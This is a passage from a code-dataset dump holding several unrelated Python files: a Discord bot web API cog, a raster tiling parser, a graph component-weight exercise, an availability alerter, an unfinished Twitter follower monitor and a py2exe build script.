\r\n\r\nmain()\r\n","sub_path":"bucket_sort_student.py","file_name":"bucket_sort_student.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"495036197","text":"from svggen.api.component import Component\nfrom svggen.utils.mymath import sin, pi, deg2rad, tan, cos, N\nfrom svggen.api.composables.graph.Face import Face\nfrom svggen.api.composables.GraphComposable import Graph\nfrom svggen.api.ports.FacePort import FacePort\nfrom svggen.api.ports.EdgePort import EdgePort\nimport IPython\n\nclass Beam(Component):\n def define(self):\n self.addParameter(\"length\")\n #ANDY TODO: figure out what these keys were for and implement them more elegantly\n #self.addParameter(\"diameter\")\n 
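# Geometry note, derived from assemble() below: for a regular n-gon cross-section\n        # beamwidth = diameter * sin(pi / shape), so either parameter determines the other,\n        # e.g. d = beamwidth / sin(pi / shape) recovers the circumscribed diameter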
self.addParameter(\"beamwidth\")\n\n self.addParameter(\"shape\", 3)\n self.addParameter(\"phase\", 0)\n\n self.addParameter(\"angle\")\n self.addParameter(\"tangle\", 90)\n self.addParameter(\"bangle\", 90)\n\n self.addInterface(\"topface\")\n self.addInterface(\"botface\")\n self.addInterface(\"topedge\")\n self.addInterface(\"botedge\")\n\n def assemble(self):\n ### Assemble the object\n try:\n tangle = self.getParameter(\"angle\")\n bangle = self.getParameter(\"angle\")\n except KeyError:\n tangle = self.getParameter(\"tangle\")\n bangle = self.getParameter(\"bangle\")\n\n try:\n d = self.getParameter(\"diameter\")\n t = self.getParameter(\"diameter\") * sin(N(pi) / self.getParameter(\"shape\"))\n except KeyError:\n d = self.getParameter(\"beamwidth\") / sin(N(pi) / self.getParameter(\"shape\"))\n t = self.getParameter(\"beamwidth\")\n\n length = self.getParameter(\"length\")\n shape = self.getParameter(\"shape\")\n phase = self.getParameter(\"phase\")\n\n radius = d/2.\n dtheta = deg2rad(360. / shape)\n thetas = [ dtheta / 2. + dtheta * i for i in range(shape) ]\n\n thickness = 2 * radius * sin(dtheta / 2.)\n\n dl = [ radius * (1 - cos(t)) / tan(deg2rad(bangle)) for t in thetas ]\n dl = [ l - dl[-phase % shape] for l in dl ]\n dr = [ radius * (1 - cos(t)) / tan(deg2rad(tangle)) for t in thetas ]\n dr = [ r - dr[-phase % shape] for r in dr ]\n\n graph = Graph()\n angle = 360.0 / shape\n faces = []\n for i in range(len(thetas)):\n faces.append(Face('', ((thickness, dr[i]), (thickness, length - dl[i]), (0, length - dl[i-1]), (0, dr[i-1]))))\n for i in range(phase):\n faces.append(faces.pop(0))\n\n fromEdge = None\n for i in range(len(faces)):\n graph.attachFace(fromEdge, faces[i], 'e3', prefix=\"r%d\"%i, angle = angle)\n fromEdge = \"r%d.e1\" % i\n\n #addTabs(self.graph, \"t1\", fromEdge, (\"r0\", \"r0.e3\"), width=min(thickness, 10), angle=angle)\n \"\"\" ANDYTODO: put back tabs\n if phase < 0:\n graph.addTab(fromEdge, faces[0].name + \".e3\", angle = angle, width=thickness)\n else:\n graph.addTab(faces[0].name + \".e3\", fromEdge, angle = angle, width=thickness)\n \"\"\"\n self.composables[\"graph\"] = graph\n\n # Assign interfaces\n self.setInterface(\"topface\", FacePort(self, [\"r%d.e0\" % n for n in range(shape)], \"\"))\n self.setInterface(\"botface\", FacePort(self, [\"r%d.e2\" % n for n in range(shape)], \"\"))\n self.setInterface(\"topedge\", EdgePort(self, \"r%d.e0\" % (-phase % shape), \"beamwidth\"))\n self.setInterface(\"botedge\", EdgePort(self, \"r%d.e2\" % (-phase % shape), \"beamwidth\"))\n \n \n\nif __name__ == \"__main__\":\n b = Beam()\n # b.toYaml(\"output/Beam/beam.yaml\")\n\n b.setParameter(\"length\", 100)\n b.setParameter(\"beamwidth\", 10)\n b.setParameter(\"shape\", 3)\n b.setParameter(\"tangle\", 90)\n b.setParameter(\"bangle\", 90)\n b.setParameter(\"phase\", 2)\n \n b.sympyicize(\"length\")\n b.sympyicize(\"beamwidth\")\n #b.symbolicize(\"length\")\n\n b.makeOutput(\"output/BeamConstrained\", protobuf=True, display=False)\n","sub_path":"svggen/library/legacy/BeamConstrained.py","file_name":"BeamConstrained.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"173386898","text":"suma = 0\nliczby = 0\ni = 1\nwhile i != 0:\n i = int(input('Podaj liczbe: '))\n #liczby += 1\n if i != 0:\n suma += i\n liczby += 1\nsrednia = suma/liczby\nprint(f'RESULT: Liczb: {liczby}, Suma = {suma}, Srednia = 
{srednia}')","sub_path":"02-ControlStructures/41.py","file_name":"41.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"22572424","text":"import asyncio\nimport yaml\nfrom discord.ext import commands\nfrom aiohttp import web\n\n\nclass WebServer(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.app = web.Application()\n self.app.router.add_get(\"/\", self.index)\n self.app.router.add_get(\"/guilds\", self.guild_count)\n self.app.router.add_get(\"/ping\", self.ping_handler)\n self.app.router.add_get(\"/userinfo\", self.userinfo)\n self.app.router.add_get(\"/guildinfo\", self.serverinfo)\n self.bot.loop.create_task(self.run())\n\n async def run(self):\n with open(\"polls.yaml\") as f:\n config = yaml.safe_load(f)\n\n self.allowed_domains = config.get(\"allowed_domains\", \"*\")\n asyncio.ensure_future(web._run_app(self.app, host=config[\"host\"], port=config[\"port\"]))\n\n async def index(self, request):\n return web.Response(text=\"Hi I'm Miso Bot!\")\n\n async def ping_handler(self, request):\n return web.Response(text=f\"{self.bot.latency*1000}\")\n\n async def guild_count(self, request):\n return web.Response(text=f\"{len(self.bot.guilds)}\")\n\n async def serverinfo(self, request):\n try:\n guildid = request.rel_url.query[\"guildid\"]\n guild = self.bot.get_guild(int(guildid))\n return web.json_response({\n \"name\": guild.name,\n \"id\": guild.id,\n \"icon\": str(guild.icon_url),\n \"owner_id\": guild.owner_id\n }, headers={\n \"Access-Control-Allow-Origin\": self.allowed_domains\n })\n except Exception as e:\n return web.Response(text=f\"Error: {e}\")\n\n async def userinfo(self, request):\n try:\n userid = request.rel_url.query[\"userid\"]\n user = self.bot.get_user(int(userid))\n return web.json_response({\n \"name\": user.name,\n \"id\": user.id,\n \"discriminator\": user.discriminator,\n \"avatar\": str(user.avatar_url),\n \"bot\": user.bot\n }, headers={\n \"Access-Control-Allow-Origin\": self.allowed_domains\n })\n except Exception as e:\n return web.Response(text=f\"Error: {e}\")\n\n def cog_unload(self):\n self.bot.loop.create_task(self.shutdown())\n\n async def shutdown(self):\n await self.app.shutdown()\n await self.app.cleanup()\n\n\ndef setup(bot):\n bot.add_cog(WebServer(bot))\n","sub_path":"cogs/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"464547940","text":"from collections import deque\nfrom time import time\n\nfrom frontend.Console import Console\nfrom metrics.Metric import Metric\nfrom utilities import string_parser\nfrom utilities.config_parser import console_config\n\n\nclass Alerter:\n __watch_time = console_config[\"alerts\"][\"duration\"]\n __availability_threshold = console_config[\"alerts\"][\"availability_threshold\"]\n\n def __init__(self):\n self.__website_name = None\n self.__recent_metrics: deque[Metric] = deque()\n self.__is_triggered = False\n\n @property\n def website_name(self) -> str:\n return self.__website_name\n\n @website_name.setter\n def website_name(self, website_name: str):\n self.__website_name = website_name\n\n def __get_availability(self) -> float:\n \"\"\"\n Return mean availability of metric list\n \"\"\"\n availability = 0\n for metric in self.__recent_metrics:\n if metric.available:\n availability += 1\n availability *= 100\n availability /= len(self.__recent_metrics)\n\n return 
availability\n\n def update(self, metric: Metric):\n \"\"\"\n Add the new metric to the list and remove the oldest ones\n \"\"\"\n now = time()\n self.__recent_metrics.append(metric)\n\n if self.__recent_metrics[-1].timestamp - self.__recent_metrics[0].timestamp >= Alerter.__watch_time:\n # handling alerts only if we have enough data\n while self.__recent_metrics[0].timestamp < now - Alerter.__watch_time:\n self.__recent_metrics.popleft()\n\n availability = self.__get_availability()\n\n if self.__is_triggered and availability >= Alerter.__availability_threshold:\n self.__is_triggered = False\n Console.add_alert(\n \"Website %s is back up. availability=%s%s, time=%s\\n\" % (\n self.website_name, string_parser.keep_n_digits(availability, 4), \"%\",\n string_parser.parse_timestamp(self.__recent_metrics[-1].timestamp)))\n\n elif not self.__is_triggered and availability < Alerter.__availability_threshold:\n self.__is_triggered = True\n Console.add_alert(\n \"Website %s is down. availability=%s%s, time=%s\\n\" % (\n self.website_name, string_parser.keep_n_digits(availability, 4), \"%\",\n string_parser.parse_timestamp(self.__recent_metrics[-1].timestamp)))\n","sub_path":"frontend/Alerter.py","file_name":"Alerter.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"535870251","text":"class Graph:\r\n def __init__(self):\r\n self.vertexes = 0\r\n self.offset = []\r\n self.edges = []\r\n self.weights = []\r\n\r\n def count_vertexes(self, count):\r\n self.vertexes = count\r\n self.offset = [0 for _ in range(self.vertexes + 1)]\r\n\r\n def create_edge(self, vertex_1, vertex_2, weight):\r\n self.edges.insert(self.offset[vertex_1], vertex_2)\r\n self.weights.insert(self.offset[vertex_1], weight)\r\n self.change_offset(vertex_1)\r\n self.edges.insert(self.offset[vertex_2], vertex_1)\r\n self.weights.insert(self.offset[vertex_2], weight)\r\n self.change_offset(vertex_2)\r\n\r\n def change_offset(self, vertex):\r\n for i in range(vertex + 1, self.vertexes + 1):\r\n self.offset[i] += 1\r\n\r\n def dfs(self, vertex=0, used=None):\r\n if used is None:\r\n used = set()\r\n if vertex in used:\r\n return used\r\n for v in self.edges[self.offset[vertex]:self.offset[vertex + 1]]:\r\n used.add(vertex)\r\n used = used.union(self.dfs(v, used))\r\n return used\r\n\r\n def is_connected(self):\r\n return True if len(self.dfs()) == len(self.offset) - 1 else False\r\n\r\n def components_weights(self):\r\n return [self.component_weight(c) for c in self.connected_components()]\r\n\r\n def component_weight(self, component):\r\n weight = 0\r\n for vertex1 in component:\r\n for vertex2 in component:\r\n if self.edge_between(vertex1, vertex2):\r\n weight_index = self.edges[self.offset[vertex1]:self.offset[vertex1 + 1]].index(vertex2)\r\n weight += self.weights[self.offset[vertex1]:self.offset[vertex1 + 1]][weight_index]\r\n return weight // 2\r\n\r\n def edge_between(self, vertex1, vertex2):\r\n if vertex2 not in self.edges[self.offset[vertex1]:self.offset[vertex1 + 1]]:\r\n return False\r\n return True\r\n\r\n def connected_components(self):\r\n components = []\r\n used = set()\r\n for i in range(self.vertexes):\r\n if i not in used:\r\n component = self.dfs(i)\r\n used = used.union(component)\r\n components.append(list(component))\r\n return components\r\n\r\n\r\nif __name__ == '__main__':\r\n n, m = map(int, input().split())\r\n gr = Graph()\r\n gr.count_vertexes(n)\r\n for _ in range(m):\r\n v1, v2, w = map(int, 
input().split())\r\n gr.create_edge(v1, v2, w)\r\n w = sorted(gr.components_weights())\r\n for j in range(len(w)):\r\n print(w[j])\r\n","sub_path":"contest_6/B - весы компонент связности.py","file_name":"B - весы компонент связности.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"155642776","text":"import logging\nimport platform\nfrom typing import Optional, Any, Union\n\nimport discord\nimport schedule\nimport tweepy\n\nfrom helpers.constants import (\n DEBUGGING_CODE,\n CHAN_BOT_SPAM_PRIVATE,\n CHAN_TWITTERVERSE,\n CHAN_GENERAL,\n ROLE_EVERYONE_PROD,\n)\nfrom helpers.embed import buildTweetEmbed\nfrom helpers.misc import general_locked\nfrom objects.Exceptions import TwitterFollowerException\nfrom objects.Logger import discordLogger\n\nasyncio_logger = discordLogger(\n name=\"asyncio\", level=logging.DEBUG if DEBUGGING_CODE else logging.INFO\n)\n\nlogger = discordLogger(\n name=__name__,\n level=logging.DEBUG if \"Windows\" in platform.platform() else logging.INFO,\n)\n\n\nclass TwitterListMember:\n def __init__(self, client: tweepy.Client, member_data):\n self.client: tweepy.Client = client\n self.user_id: Optional[Union[int, str]] = member_data[\"id\"]\n self.name: Optional[str] = member_data[\"name\"]\n self.usernamename: Optional[str] = member_data[\"username\"]\n self.orig_followers: Optional[Union[dict, Any]] = None\n self.new_followers: Optional[Union[dict, Any]] = None\n\n self._collect_users(initial=True)\n\n def _collect_users(self, initial: bool) -> None:\n if initial:\n self.orig_followers = self.client.get_users_following(id=self.user_id)\n else:\n self.new_followers = self.client.get_users_following(id=self.user_id)\n\n @property\n def differences(self): # TODO Type hinting\n # TODO Not sure if this all works.\n self._collect_users(initial=False)\n\n if not self.new_followers:\n return\n\n return set(self.orig_followers) ^ set(self.new_followers)\n\n\nasync def send_tweet(client: discord.Client, member: TwitterListMember) -> None:\n # class TwitterButtons(discord.ui.View):\n # def __init__(\n # self,\n # timeout=1200,\n # ) -> None:\n # super(TwitterButtons, self).__init__()\n # self.message: Optional[discord.Message] = None\n # self.timeout = timeout\n # self.client = client\n #\n # async def on_timeout(self) -> None:\n # tweepy_client_logger.debug(\n # \"Twitter buttons have timed out. Removing all buttons\"\n # )\n #\n # self.clear_items()\n # await self.message.edit(view=self)\n #\n # # noinspection PyMethodMayBeStatic\n # def grabTwitterLink(self, message_embed: discord.Embed) -> str:\n # link: list[str] = [\n # field.value\n # for field in message_embed.fields\n # if field.name == \"Link to Tweet\"\n # ]\n # return \"\".join(link)\n #\n # @discord.ui.button(\n # label=\"Send to General\",\n # custom_id=\"send_to_general\",\n # style=discord.ButtonStyle.gray,\n # )\n # async def send_to_general(\n # self, interaction: discord.Interaction, button: discord.ui.Button\n # ):\n # tweepy_client_logger.debug(\"Sending tweet to general channel\")\n #\n # general_channel: discord.TextChannel = await self.client.fetch_channel(\n # CHAN_GENERAL\n # )\n #\n # if general_locked(\n # general_channel, self.client.guilds[0].get_role(ROLE_EVERYONE_PROD)\n # ):\n # tweepy_client_logger.debug(\n # \"Game day mode is on. 
Will send tweets to live discussion.\"\n # )\n # general_channel = await self.client.fetch_channel(CHAN_DISCUSSION_LIVE)\n #\n # await general_channel.send(\n # f\"{interaction.user.name}#{interaction.user.discriminator} forwarded the following tweet: {self.grabTwitterLink(interaction.message.embeds[0])}\"\n # )\n # await interaction.response.send_message(\"Tweet forwarded!\", ephemeral=True)\n #\n # @discord.ui.button(\n # label=\"Send to Recruiting\",\n # custom_id=\"send_to_recruiting\",\n # style=discord.ButtonStyle.gray,\n # )\n # async def send_to_recruiting(\n # self, interaction: discord.Interaction, button: discord.ui.Button\n # ):\n # tweepy_client_logger.debug(\"Sending tweet to recruiting channel\")\n #\n # recruiting_channel = await self.client.fetch_channel(CHAN_RECRUITING)\n #\n # if general_locked(\n # recruiting_channel, self.client.guilds[0].get_role(ROLE_EVERYONE_PROD)\n # ):\n # tweepy_client_logger.debug(\n # \"Game day mode is on. Will send tweets to streaming discussion.\"\n # )\n # recruiting_channel = await self.client.fetch_channel(\n # CHAN_DISCUSSION_STREAMING\n # )\n #\n # await recruiting_channel.send(\n # f\"{interaction.user.name}#{interaction.user.discriminator} forwarded the following tweet: {self.grabTwitterLink(interaction.message.embeds[0])}\"\n # )\n # await interaction.response.send_message(\"Tweet forwarded!\", ephemeral=True)\n\n logger.debug(f\"Sending a tweet...\")\n\n if DEBUGGING_CODE:\n twitter_channel: discord.TextChannel = await client.fetch_channel(\n CHAN_BOT_SPAM_PRIVATE\n )\n else:\n twitter_channel = await client.fetch_channel(CHAN_TWITTERVERSE)\n\n embed = buildTweetEmbed(response=response)\n\n # author: User = response.includes[\"users\"][0]\n\n # view: TwitterButtons = TwitterButtons()\n\n test_channel: discord.TextChannel = await client.fetch_channel(CHAN_GENERAL)\n\n if general_locked(test_channel, client.guilds[0].get_role(ROLE_EVERYONE_PROD)):\n view.children[0].label = \"Send to Live\" # noqa\n view.children[1].label = \"Send to Streaming\" # noqa\n\n # view.add_item(\n # item=discord.ui.Button(\n # style=discord.ButtonStyle.url,\n # label=\"Open Tweet...\",\n # url=f\"https://twitter.com/{author.username}/status/{response.data.id}\",\n # )\n # )\n # view.message = await twitter_channel.send(embed=embed, view=view)\n # logger.debug(\"Waiting for twitter buttons to be pushed\")\n\n # asyncio.run_coroutine_threadsafe(coro=view.wait(), loop=client.loop)\n\n logger.info(f\"Tweet sent!\")\n\n\nclass TwitterFollowerMonitor:\n def __init__(self, client: tweepy.Client, members: Union[dict, Any]):\n self.client: tweepy.Client = client\n self.list_members: Optional[list[TwitterListMember]] = self._setup_list_members(\n members=members\n )\n asyncio_logger.debug(\"Creating Twitter Follower Monitor\")\n\n self._setup_schedule()\n\n def _setup_list_members(self, members: Union[dict, Any]) -> list[TwitterListMember]:\n return [\n TwitterListMember(client=self.client, member_data=member)\n for member in members\n ]\n\n def check_differences(self):\n asyncio_logger.debug(\"Attempting to check for Twitter Follower differences\")\n\n assert self.list_members, TwitterFollowerException(\"Error\")\n\n for member in self.list_members:\n continue\n\n @property\n def all_jobs(self) -> str:\n all_jobs: list[schedule.Job] = schedule.jobs\n all_jobs_str: str = \"\"\n for job in all_jobs:\n all_jobs_str += f\"* {repr(job)}\\n\"\n\n return all_jobs_str\n\n def _setup_schedule(self) -> None:\n asyncio_logger.debug(\"Setting up Twitter Monitor Follower 
schedule\")\n\n schedule.every().hour.do(self.check_differences)\n\n asyncio_logger.debug(\n f\"Scheduled messages complete. Jobs are:\\n\\n{self.all_jobs}\"\n )\n","sub_path":"objects/TweepyFollowerMonitor.py","file_name":"TweepyFollowerMonitor.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"306119021","text":"import os\nimport deepdanbooru as dd\nimport tensorflow as tf\n\nDEFAULT_PROJECT_CONTEXT = {\n 'image_width': 299,\n 'image_height': 299,\n 'database_path': None,\n 'minimum_tag_count': 20,\n 'model': 'resnet_custom_v2',\n 'minibatch_size': 32,\n 'epoch_count': 10,\n 'export_model_per_epoch': 10,\n 'checkpoint_frequency_mb': 200,\n 'console_logging_frequency_mb': 10,\n 'optimizer': 'adam',\n 'learning_rate': 0.001,\n 'rotation_range': [0.0, 360.0],\n 'scale_range': [0.9, 1.1],\n 'shift_range': [-0.1, 0.1]\n}\n\n\ndef load_project(project_path):\n project_context_path = os.path.join(project_path, 'project.json')\n project_context = dd.io.deserialize_from_json(project_context_path)\n tags = dd.data.load_tags(project_path)\n\n model_type = project_context['model']\n model_path = os.path.join(project_path, f'model-{model_type}.h5')\n model = tf.keras.models.load_model(model_path)\n\n return project_context, model, tags\n","sub_path":"deepdanbooru/project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"570931184","text":"import datetime\nimport glob\nimport os\nimport shutil\nimport tempfile\nimport traceback\nimport zipfile\n\nimport numpy\n\nfrom django.conf import settings\nfrom django.contrib.gis.gdal import GDALRaster\nfrom django.db import connection\nfrom django.dispatch import Signal\nfrom raster import tiler\nfrom raster.const import WEB_MERCATOR_SRID, WEB_MERCATOR_TILESIZE\nfrom raster.models import RasterLayerBandMetadata, RasterTile\n\nrasterlayers_parser_ended = Signal(providing_args=['instance'])\n\n\nclass RasterLayerParser(object):\n \"\"\"\n Class to parse raster layers.\n \"\"\"\n def __init__(self, rasterlayer):\n self.rasterlayer = rasterlayer\n self.rastername = os.path.basename(rasterlayer.rasterfile.name)\n\n # Set raster tilesize\n self.tilesize = int(getattr(settings, 'RASTER_TILESIZE', WEB_MERCATOR_TILESIZE))\n self.zoomdown = getattr(settings, 'RASTER_ZOOM_NEXT_HIGHER', True)\n\n def log(self, msg, reset=False, status=None, zoom=None):\n \"\"\"\n Write a message to the parse log of the rasterlayer instance and update\n the parse status object.\n \"\"\"\n if status is not None:\n self.rasterlayer.parsestatus.status = status\n\n if zoom is not None:\n self.rasterlayer.parsestatus.tile_level = zoom\n\n # Prepare datetime stamp for log\n now = '[{0}] '.format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n # Write log, reset if requested\n if reset:\n self.rasterlayer.parsestatus.log = now + msg\n else:\n self.rasterlayer.parsestatus.log += '\\n' + now + msg\n\n self.rasterlayer.save()\n self.rasterlayer.parsestatus.save()\n\n def get_raster_file(self):\n \"\"\"\n Make local copy of rasterfile, which is needed if files are stored on\n remote storage, and unzip it if necessary.\n \"\"\"\n self.log('Getting raster file from storage')\n\n raster_workdir = getattr(settings, 'RASTER_WORKDIR', None)\n self.tmpdir = tempfile.mkdtemp(dir=raster_workdir)\n\n # Access rasterfile and store in a temp folder\n rasterfile = 
open(os.path.join(self.tmpdir, self.rastername), 'wb')\n for chunk in self.rasterlayer.rasterfile.chunks():\n rasterfile.write(chunk)\n rasterfile.close()\n\n # If the raster file is compressed, decompress it\n fileName, fileExtension = os.path.splitext(self.rastername)\n\n if fileExtension == '.zip':\n\n # Open and extract zipfile\n zf = zipfile.ZipFile(os.path.join(self.tmpdir, self.rastername))\n zf.extractall(self.tmpdir)\n\n # Remove zipfile\n os.remove(os.path.join(self.tmpdir, self.rastername))\n\n # Get filelist from directory\n raster_list = glob.glob(os.path.join(self.tmpdir, \"*.*\"))\n\n # Check if only one file is found in zipfile\n if len(raster_list) > 1:\n self.log(\n 'WARNING: Found more than one file in zipfile '\n 'using only first file found. This might lead '\n 'to problems if its not a raster file.'\n )\n\n # Return first one as raster file\n self.rastername = os.path.basename(raster_list[0])\n\n def open_raster_file(self):\n \"\"\"\n Open the raster file as GDALRaster and set nodata-values.\n \"\"\"\n self.log('Opening raster file as GDALRaster.')\n\n # Open raster file\n self.dataset = GDALRaster(os.path.join(self.tmpdir, self.rastername), write=True)\n\n # Make sure nodata value is set from input\n self.hist_values = []\n self.hist_bins = []\n for i, band in enumerate(self.dataset.bands):\n if self.rasterlayer.nodata is not None:\n band.nodata_value = float(self.rasterlayer.nodata)\n\n # Create band metatdata object\n bandmeta = RasterLayerBandMetadata.objects.create(\n rasterlayer=self.rasterlayer,\n band=i,\n nodata_value=band.nodata_value,\n min=band.min,\n max=band.max\n )\n\n # Prepare numpy hist values and bins\n self.hist_values.append(numpy.array(bandmeta.hist_values))\n self.hist_bins.append(numpy.array(bandmeta.hist_bins))\n\n # Store original metadata for this raster\n meta = self.rasterlayer.metadata\n\n meta.uperleftx = self.dataset.origin.x\n meta.uperlefty = self.dataset.origin.y\n meta.width = self.dataset.width\n meta.height = self.dataset.height\n meta.scalex = self.dataset.scale.x\n meta.scaley = self.dataset.scale.y\n meta.skewx = self.dataset.skew.x\n meta.skewy = self.dataset.skew.y\n meta.numbands = len(self.dataset.bands)\n meta.srs_wkt = self.dataset.srs.wkt\n meta.srid = self.dataset.srs.srid\n\n meta.save()\n\n def close_raster_file(self):\n \"\"\"\n On Windows close and release the GDALRaster resources\n \"\"\"\n try:\n if self.dataset:\n del self.dataset\n self.dataset = None\n except AttributeError:\n pass\n\n def create_tiles(self, zoom):\n \"\"\"\n Create tiles for this raster at the given zoomlevel.\n\n This routine first snaps the raster to the grid of the zoomlevel,\n then creates the tiles from the snapped raster.\n \"\"\"\n # Compute the tile x-y-z index range for the rasterlayer for this zoomlevel\n bbox = self.rasterlayer.extent()\n indexrange = tiler.tile_index_range(bbox, zoom)\n\n # Compute scale of tiles for this zoomlevel\n tilescale = tiler.tile_scale(zoom)\n\n # Count the number of tiles that are required to cover the raster at this zoomlevel\n nr_of_tiles = (indexrange[2] - indexrange[0] + 1) * (indexrange[3] - indexrange[1] + 1)\n\n # Create destination raster file\n self.log('Snapping dataset to zoom level {0}'.format(zoom))\n\n bounds = tiler.tile_bounds(indexrange[0], indexrange[1], zoom)\n sizex = (indexrange[2] - indexrange[0] + 1) * self.tilesize\n sizey = (indexrange[3] - indexrange[1] + 1) * self.tilesize\n dest_file = os.path.join(self.tmpdir, 'djangowarpedraster' + str(zoom) + '.tif')\n\n snapped_dataset = 
self.dataset.warp({\n 'name': dest_file,\n 'origin': [bounds[0], bounds[3]],\n 'scale': [tilescale, -tilescale],\n 'width': sizex,\n 'height': sizey,\n })\n\n self.log('Creating {0} tiles for zoom {1}.'.format(nr_of_tiles, zoom))\n\n counter = 0\n for tilex in range(indexrange[0], indexrange[2] + 1):\n for tiley in range(indexrange[1], indexrange[3] + 1):\n # Log progress\n counter += 1\n if counter % 250 == 0:\n self.log('{0} tiles created at zoom {1}'.format(counter, zoom))\n\n # Calculate raster tile origin\n bounds = tiler.tile_bounds(tilex, tiley, zoom)\n\n # Construct band data arrays\n pixeloffset = (\n (tilex - indexrange[0]) * self.tilesize,\n (tiley - indexrange[1]) * self.tilesize\n )\n\n band_data = [\n {\n 'data': band.data(offset=pixeloffset, size=(self.tilesize, self.tilesize)),\n 'nodata_value': band.nodata_value\n } for band in snapped_dataset.bands\n ]\n\n # Add tile data to histogram\n if zoom == self.max_zoom:\n self.push_histogram(band_data)\n\n # Warp source raster into this tile (in memory)\n dest = GDALRaster({\n 'width': self.tilesize,\n 'height': self.tilesize,\n 'origin': [bounds[0], bounds[3]],\n 'scale': [tilescale, -tilescale],\n 'srid': WEB_MERCATOR_SRID,\n 'datatype': snapped_dataset.bands[0].datatype(),\n 'bands': band_data,\n })\n\n # Store tile\n RasterTile.objects.create(\n rast=dest,\n rasterlayer=self.rasterlayer,\n tilex=tilex,\n tiley=tiley,\n tilez=zoom\n )\n\n # Store histogram data\n if zoom == self.max_zoom:\n bandmetas = RasterLayerBandMetadata.objects.filter(rasterlayer=self.rasterlayer)\n for bandmeta in bandmetas:\n bandmeta.hist_values = self.hist_values[bandmeta.band].tolist()\n bandmeta.save()\n\n # Remove snapped dataset\n self.log('Removing snapped dataset.', zoom=zoom)\n snapped_dataset = None\n os.remove(dest_file)\n\n def push_histogram(self, data):\n \"\"\"\n Add data to band level histogram histogram.\n \"\"\"\n # Loop through bands of this tile\n for i, dat in enumerate(data):\n # Create histogram for new data with the same bins\n new_hist = numpy.histogram(dat['data'], bins=self.hist_bins[i])\n # Add counts of this tile to band metadata histogram\n self.hist_values[i] += new_hist[0]\n\n def drop_empty_rasters(self):\n \"\"\"\n Remove rasters that are only no-data from the current rasterlayer.\n \"\"\"\n self.log(\n 'Dropping empty raster tiles.',\n status=self.rasterlayer.parsestatus.DROPPING_EMPTY_TILES\n )\n\n # Setup SQL command\n sql = (\n \"DELETE FROM raster_rastertile \"\n \"WHERE ST_Count(rast)=0 \"\n \"AND rasterlayer_id={0}\"\n ).format(self.rasterlayer.id)\n\n # Run SQL to drop empty tiles\n cursor = connection.cursor()\n cursor.execute(sql)\n\n def parse_raster_layer(self):\n \"\"\"\n This function pushes the raster data from the Raster Layer into the\n RasterTile table.\n \"\"\"\n try:\n # Clean previous parse log\n self.log(\n 'Started parsing raster file',\n reset=True,\n status=self.rasterlayer.parsestatus.DOWNLOADING_FILE\n )\n\n # Download, unzip and open raster file\n self.get_raster_file()\n self.open_raster_file()\n\n # Remove existing tiles for this layer before loading new ones\n self.rasterlayer.rastertile_set.all().delete()\n\n # Transform raster to global srid\n if self.dataset.srs.srid == WEB_MERCATOR_SRID:\n self.log('Dataset already in SRID {0}, skipping transform'.format(WEB_MERCATOR_SRID))\n else:\n self.log(\n 'Transforming raster to SRID {0}'.format(WEB_MERCATOR_SRID),\n status=self.rasterlayer.parsestatus.REPROJECTING_RASTER\n )\n self.dataset = self.dataset.transform(WEB_MERCATOR_SRID)\n\n # 
Compute max zoom at the web mercator projection\n self.max_zoom = tiler.closest_zoomlevel(\n abs(self.dataset.scale.x)\n )\n\n # Store max zoom level in metadata\n self.rasterlayer.metadata.max_zoom = self.max_zoom\n self.rasterlayer.metadata.save()\n\n # Reduce max zoom by one if zoomdown flag was disabled\n if not self.zoomdown:\n self.max_zoom -= 1\n\n self.log(\n 'Started creating tiles',\n status=self.rasterlayer.parsestatus.CREATING_TILES\n )\n\n # Loop through all lower zoom levels and create tiles to\n # setup TMS aligned tiles in world mercator\n for iz in range(self.max_zoom + 1):\n self.create_tiles(iz)\n\n self.drop_empty_rasters()\n\n # Send signal for end of parsing\n rasterlayers_parser_ended.send(sender=self.rasterlayer.__class__, instance=self.rasterlayer)\n\n # Log success of parsing\n self.log(\n 'Successfully finished parsing raster',\n status=self.rasterlayer.parsestatus.FINISHED\n )\n except:\n self.log(\n traceback.format_exc(),\n status=self.rasterlayer.parsestatus.FAILED\n )\n raise\n finally:\n self.close_raster_file()\n shutil.rmtree(self.tmpdir)\n","sub_path":"raster/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":12587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"262347046","text":"from distutils.core import setup\r\nimport py2exe\r\nfrom glob import glob\r\nimport django\r\nimport os\r\n\r\nclass Target:\r\n def __init__(self, **kw):\r\n self.__dict__.update(kw)\r\n # for the versioninfo resources\r\n self.version = \"1.0.0.0\"\r\n self.company_name = \"Estudio 89\"\r\n self.copyright = \"Copyright (c) 2015 Estudio 89.\"\r\n self.name = \"EngageService\"\r\n\r\n\r\ndef find_django_modules(exclude=[]):\r\n modules = []\r\n django_path = django.__path__[0]\r\n generator = os.walk(django.__path__[0])\r\n generator.next()\r\n for root, dirs, files in generator:\r\n if files.count(\"__init__.py\"):\r\n for f in files:\r\n if f.endswith(\".py\") and f != \"__init__.py\":\r\n full_path = root + \"\\\\\" + f\r\n mod = full_path.replace(django_path + \"\\\\\",\"\")\r\n mod = mod.replace(\".py\",\"\")\r\n mod = \"django.\" + 